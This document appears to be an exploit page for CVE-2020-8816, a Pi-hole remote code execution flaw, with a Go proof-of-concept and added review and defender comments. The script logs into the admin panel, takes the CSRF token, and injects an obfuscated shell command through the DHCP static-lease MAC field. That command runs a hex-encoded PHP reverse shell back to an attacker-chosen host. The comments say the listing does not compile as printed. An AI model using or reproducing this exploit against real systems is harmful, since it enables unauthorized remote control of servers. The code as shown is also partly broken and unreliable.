
CVE-2020-8816 Pi-hole 远程代码执行漏洞



影响版本

Pi-hole <= 4.3.2

POC

go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://target/admin/
package main


import (
   "flag"
   "log"
   "strings"
   "github.com/anaskhan96/soup"
   "encoding/hex"
   "github.com/levigross/grequests"
)

// Options holds the run-time configuration collected from the command line by
// extractFlags. Field order is significant: extractFlags builds the value with
// a positional literal.
type Options struct {
   url      string // admin panel base URL; "index.php" is appended directly, so a trailing slash is expected
   password string // admin panel password sent as the "pw" form field
   host     string // address the reverse shell connects back to
   port     string // port the reverse shell connects back to
}


// Package-level copies of the Options fields. main populates them once; they
// are read by generate_shell (HOST, PORT), doLogin (URL, PASSWD), getToken
// and Exploit (URL).
var (
   HOST   string // reverse-shell callback address
   URL    string // admin panel base URL
   PORT   string // reverse-shell callback port
   PASSWD string // admin panel password
)

// generate_shell builds the PHP one-liner that the injected command runs on
// the target: it opens a TCP connection back to HOST:PORT with fsockopen and
// starts an interactive /bin/sh with stdin/stdout/stderr bound to that socket.
// The result is hex-encoded because Exploit wraps it in HEX2BIN(...).
// Defender note: on an affected Pi-hole this activity is visible as the web
// server's PHP process running `php -r` and then `/bin/sh -i` with an
// outbound TCP socket as its standard streams — a high-signal process tree
// for endpoint detection.
// NOTE(review): `byte(payload)` is not a []byte conversion; the listing does
// not compile as printed on the page.
func generate_shell() string{
   payload := "php -r '$sock=fsockopen(\"HOST\", PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
   // Each placeholder occurs once in the template; only the first match is replaced.
   payload = strings.Replace(payload, "HOST", HOST, 1)
   payload = strings.Replace(payload, "PORT", PORT, 1)
   return hex.EncodeToString(byte(payload))
}

// extractFlags parses the command-line flags (-u, -pass, -host, -p) into an
// Options value. The defaults are placeholders (10.0.0.1, port 1337, password
// "admin") and are expected to be overridden on the command line.
func extractFlags() *Options {
   var opts Options
   flag.StringVar(&opts.url, "u", "http://10.0.0.1/admin/", "Set the Url of the admin panel")
   flag.StringVar(&opts.password, "pass", "admin", "Admin Password")
   flag.StringVar(&opts.host, "host", "10.0.0.1", "Set the host for the reverse shell")
   flag.StringVar(&opts.port, "p", "1337", "Set Port for the reverse shell")
   flag.Parse()
   return &opts
}

// doLogin authenticates against the Pi-hole admin panel by POSTing PASSWD as
// the "pw" form field to URL+"index.php" and returns the same session, which
// presumably now carries the login cookie used by getToken and Exploit.
// This makes the whole chain an authenticated exploit: without the admin
// password it cannot proceed past this step.
// NOTE(review): a non-OK HTTP status is only logged; the function still
// prints "Logged In!" and returns the session, so a wrong password is not
// detected here (it would presumably surface later as a missing token).
// NOTE(review): `mapstringstring` does not compile as printed on the page.
func doLogin(ses *grequests.Session) *grequests.Session{
   log.Println("Logging In...")
   resp, err := ses.Post(URL+"index.php",&grequests.RequestOptions{Data: mapstringstring{"pw": PASSWD}})
   if err != nil {
       // Transport-level failure only; an HTTP error status is handled below.
       log.Fatal("Error logging-in: ", err)
   }

   if resp.Ok != true {
       log.Println("Request for log-in did not return OK")
   }
   log.Println("Logged In!")
   return ses
}

// getToken fetches URL+"index.php" with the logged-in session, parses the
// returned HTML and returns the text of the <div id="token"> element, which
// Exploit sends back as the "token" form field to settings.php.
// NOTE(review): as in doLogin a non-OK status is only logged. If the div is
// absent (e.g. login failed), .Text() is called on the result of a failed
// Find; what the soup library does in that case is not visible here —
// presumably a panic or an empty string.
func getToken(ses *grequests.Session) string{
   resp, err:= ses.Get(URL+"index.php",nil)
       if err != nil {
       log.Fatal("Error getting token: ", err)
   }

   if resp.Ok != true {
       log.Println("Request for getting token did not return OK")
   }
   html := soup.HTMLParse(resp.String())
   token := html.Find("div","id","token").Text()
   return token
}

// Exploit sends the command-injection request. The injected text travels in
// the "AddMAC" field of a DHCP static-lease form POST to URL+"settings.php",
// together with the CSRF token from getToken. full_payload is twelve 'a'
// characters (presumably to satisfy a length check — not verified here)
// followed by "&&"-chained shell assignments built from parameter expansions
// of $PATH and $IFS, ending in a call that hex-decodes `payload` and
// executes it.
// Defender notes: this request is easy to tell apart from legitimate use —
// a MAC field containing "&&", "${" or "$IFS" is never a valid MAC address,
// and the static-lease IP and hostname are fixed placeholders (10.10.10.10).
// The request is authenticated, so admin-credential hygiene limits exposure,
// and the durable fix is upgrading past the affected versions (<= 4.3.2 per
// the page).
// NOTE(review): `mapstringstring` does not compile as printed on the page.
func Exploit(ses *grequests.Session, token string, payload string) {
   full_payload := "aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN(\"" + payload + "\"));'&&"
   resp,err := ses.Post(URL + "settings.php", &grequests.RequestOptions{Data: mapstringstring{
       "AddMAC":full_payload,
       "field":"DHCP",
       "AddIP":"10.10.10.10",
       "AddHostname":"10.10.10.10",
       "addstatic":"",
       "token":token}})
           if err != nil {
       // Transport-level failure only; an HTTP error status is handled below.
       log.Fatal("Error sending payload: ", err)
   }

   // A non-OK status is logged but not treated as failure.
   if resp.Ok != true {
       log.Println("Request for sending payload did not return OK")
   }
}


// main wires the steps together: parse flags into the package globals, log in
// with the admin password, fetch the CSRF token, build the hex-encoded
// reverse-shell command and send it via the settings.php form. Every step
// except Exploit itself aborts the program on a transport error (log.Fatal);
// HTTP error statuses are only logged, so the final "Exploit executed"
// message does not confirm success.
func main(){
   options := extractFlags()
   // Copy the parsed options into the globals read by the helpers below.
   HOST = options.host
   URL = options.url
   PORT = options.port
   PASSWD = options.password
   session := grequests.NewSession(nil)
   // Return value ignored: doLogin hands back the same session it was given.
   doLogin(session)
   log.Println("Getting Token...")
   token := getToken(session)
   log.Println("Token:",token)
   log.Println("Generating payload...")
   payload := generate_shell()
   log.Println("Payload generated:",payload)
   log.Println("Sending exploit...")
   Exploit(session, token, payload)
   log.Println("Exploit executed, check your session")
}
